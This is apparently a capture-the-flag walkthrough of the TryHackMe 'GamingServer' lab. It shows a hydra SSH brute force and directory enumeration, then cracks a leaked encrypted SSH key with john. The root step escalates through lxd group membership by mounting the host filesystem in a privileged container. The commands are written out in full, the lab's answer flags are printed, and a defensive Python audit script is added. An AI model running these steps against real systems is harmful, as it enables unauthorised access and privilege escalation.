  • aldern00b

GamingServer - THM

Can you gain access to this gaming server built by amateurs with no experience of web development and take advantage of the deployment system?


Enumerate to see ports 22 and 80 open. We don't have creds for 22, so let's peek at 80.

Cool! Looks like a D&D style game.... I'd probably play this


Well, we might have a username here. Let's use that with hydra to check out SSH.


hydra -l john -P /usr/share/wordlists/rockyou.txt 10.10.113.151 ssh

While we do that, let's also gobuster the web server.

gobuster dir -u http://10.10.113.151 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster finds us some stuff. Let's make sure we enumerate these two folders fully by running another gobuster against each of them, this time adding the -x option so it searches for files as well as directories.

gobuster dir -u http://10.10.113.151/secret -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,htm,html

Inside /secret we get an RSA private key (SecretKey). Its header (Proc-Type: 4,ENCRYPTED, DEK-Info: AES-128-CBC) shows the key is passphrase-protected, which is why we need to crack it before it is usable.


We can download that directly to a file using

wget http://[IP]/secret/SecretKey

I'm going to copy that to a new file called id_rsa so I can play with it without breaking the original. First we need to use ssh2john to extract a crackable hash from it. If you're not sure where ssh2john is, you can run this command to find it:

find / -type f -name ssh2john* 2>/dev/null

Run ssh2john like this:

python ssh2john id_rsa > hash

Then we crack that hash with john (note that john is pointed at the hash file we just wrote, not at the key itself):

john hash --wordlist=/usr/share/wordlists/rockyou.txt

The passphrase gets found.

Now we want to be able to use the id_rsa file. SSH refuses a private key with permissive file modes, so I'm going to chmod it to 400 first. Then we connect like this:

ssh john@[IP] -i id_rsa

That lets us in. It looks like john is part of the sudo group, but his RSA key passphrase is different from his login password, so it doesn't get us through sudo.

Either way, let's grab the user flag while we're here.

What is the user flag? a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e

I was hoping to take advantage of that lxd group, but this shell doesn't have internet access. Instead, I downloaded linpeas on my workstation, hosted it on a python web server, fetched it from the target shell, and ran it to see what's available.


Needing some help figuring out the lxc side of things, I found a writeup that pointed me here: https://www.hackingarticles.in/lxd-privilege-escalation/


Getting this done was actually quite easy once I found the right resource. We needed to build the Alpine image on our own machine and transfer it over, though, as we didn't have access to GitHub from the remote machine:

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

Host a python http.server (the wget below assumes port 8000) and then transfer the tar.gz that was created:

cd /tmp
wget http://[IP]:8000/alpine-v3.10-x86_64-20191008_1227.tar.gz
lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true   # privileged container: root inside maps to root on the host
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true   # expose the host filesystem inside the container
lxc start ignite
lxc exec ignite /bin/sh
id   # should now report uid=0(root)

Once inside the container, navigate to /mnt/root to see the host machine's entire filesystem.
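From the defender's side, the combination that made this work (security.privileged=true plus a disk device whose source is the host's /) is easy to spot in a container's config. The following audit script is an added example, not part of the original post or the LXD project; it parses a constructed sample in the shape of `lxc config show <name> --expanded` output (assumed format, with a small indented key: value parser instead of a YAML library) and flags any such device.

```python
"""Flag LXD containers whose config exposes the host root filesystem.
Added example (not from the original writeup). Feed it the text of
`lxc config show <container> --expanded` for each container on a host."""
from typing import Dict, List

# Constructed sample mimicking the output for the 'ignite' container built above.
SAMPLE_CONFIG = """\
architecture: x86_64
config:
  image.os: alpine
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
  root:
    path: /
    pool: default
    type: disk
name: ignite
"""

def parse_block(text: str) -> Dict:
    """Parse the indented 'key: value' subset used by lxc config output into nested dicts."""
    root: Dict = {}
    stack: List[tuple] = [(-1, root)]  # (indent level, dict being filled)
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        key, _, value = raw.strip().partition(":")
        while indent <= stack[-1][0]:  # dedent: leave nested mappings
            stack.pop()
        parent = stack[-1][1]
        value = value.strip().strip('"')
        if value == "":  # a key with no value opens a nested mapping
            child: Dict = {}
            parent[key] = child
            stack.append((indent, child))
        else:
            parent[key] = value
    return root

def host_mount_findings(config_text: str) -> List[str]:
    """One finding per disk device that mounts the host's / into the container."""
    cfg = parse_block(config_text)
    privileged = cfg.get("config", {}).get("security.privileged", "false") == "true"
    findings = []
    for name, dev in cfg.get("devices", {}).items():
        if dev.get("type") == "disk" and dev.get("source") == "/":
            sev = "CRITICAL" if privileged else "HIGH"  # privileged + host root = host takeover
            findings.append(f"{sev}: device {name!r} mounts host / at {dev.get('path')} (privileged={privileged})")
    return findings

if __name__ == "__main__":
    for line in host_mount_findings(SAMPLE_CONFIG):
        print(line)
```

The real fix is upstream of the check: membership in the lxd group is equivalent to root, so it belongs only to administrators.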

What is the root flag? 2e337b8c9f3aff0c2b3e8d4e6a7c88fc